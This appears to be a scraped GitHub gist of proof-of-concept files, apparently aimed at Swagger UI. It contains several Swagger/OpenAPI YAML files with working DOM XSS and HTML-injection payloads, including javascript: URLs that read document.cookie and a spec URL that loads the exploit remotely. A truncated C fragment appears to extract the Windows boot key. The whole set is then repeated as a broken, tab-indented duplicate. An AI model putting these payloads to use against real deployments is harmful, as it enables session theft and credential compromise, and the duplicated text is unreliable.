Joel Chang joelczk

## extract_boot_key.c
#include <windows.h>
#include <stdio.h>
#define BOOT_KEY_SIZE 16
#pragma warning(disable: 4996)

void hexStringToByteArray(const char* hexString, BYTE* byteArray) {
    size_t len = strlen(hexString);
    for (size_t i = 0; i < len / 2; ++i) {
        sscanf(hexString + 2 * i, "%2hhx", &byteArray[i]);
    }

## exploit.yaml
swagger: '2.0'
info:
  version: "0.0.1"
  title: DOM XSS PoC
  description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(/swagger-rxss/) src=1>"></form>
paths:
  /:
    get:
      responses:
        200:

## test.yaml
swagger: '2.0'
info:
  version: "0.0.1"
  title: DOM XSS PoC
  description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>"></form>
paths:
  /:
    get:
      responses:
        200:

## test.yaml
swagger: '2.0'
info:
  title: HTML INJECTION
  description: '<div>HTML INJECTION</div>'
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified

## auth.yaml
wagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: http://authorization.site
info:
  version: "0.0.1"
  title: Swagger POC
  description: Please Authorize!<video src=//authorization.site>
paths:

## swagger.json
{
    "url": "https://gist.githubusercontent.com/joelczk/39c0d720c566508d90a0995664ed056b/raw/b811cd57ee8786ee25320f28b247dfa18080d4ca/exploit.yaml",
    "urls": [
        {
            "url": "https://gist.githubusercontent.com/joelczk/39c0d720c566508d90a0995664ed056b/raw/b811cd57ee8786ee25320f28b247dfa18080d4ca/exploit.yaml",
            "name": "Foo"
        }
    ]
}

## swagger.yaml
swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: Swagger XSS
  description: <img src=x onerror=alert(1)>
  termsOfService: "javascript:alert(document.cookie)"
	#include <windows.h>
	#include <stdio.h>
	#define BOOT_KEY_SIZE 16
	#pragma warning(disable: 4996)

	void hexStringToByteArray(const char* hexString, BYTE* byteArray) {
	size_t len = strlen(hexString);
	for (size_t i = 0; i < len / 2; ++i) {
	sscanf(hexString + 2 * i, "%2hhx", &byteArray[i]);
	}
	swagger: '2.0'
	info:
	version: "0.0.1"
	title: DOM XSS PoC
	description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(/swagger-rxss/) src=1>"></form>
	paths:
	/:
	get:
	responses:
	200:
	swagger: '2.0'
	info:
	title: HTML INJECTION
	description: '<div>HTML INJECTION</div>'
	paths:
	/accounts:
	get:
	responses:
	'200':
	description: No response was specified
	wagger: '2.0'
	securityDefinitions:
	a:
	type: oauth2
	authorizationUrl: http://authorization.site
	info:
	version: "0.0.1"
	title: Swagger POC
	description: Please Authorize!<video src=//authorization.site>
	paths:
	{
	"url": "https://gist.githubusercontent.com/joelczk/39c0d720c566508d90a0995664ed056b/raw/b811cd57ee8786ee25320f28b247dfa18080d4ca/exploit.yaml",
	"urls": [
	{
	"url": "https://gist.githubusercontent.com/joelczk/39c0d720c566508d90a0995664ed056b/raw/b811cd57ee8786ee25320f28b247dfa18080d4ca/exploit.yaml",
	"name": "Foo"
	}
	]
	}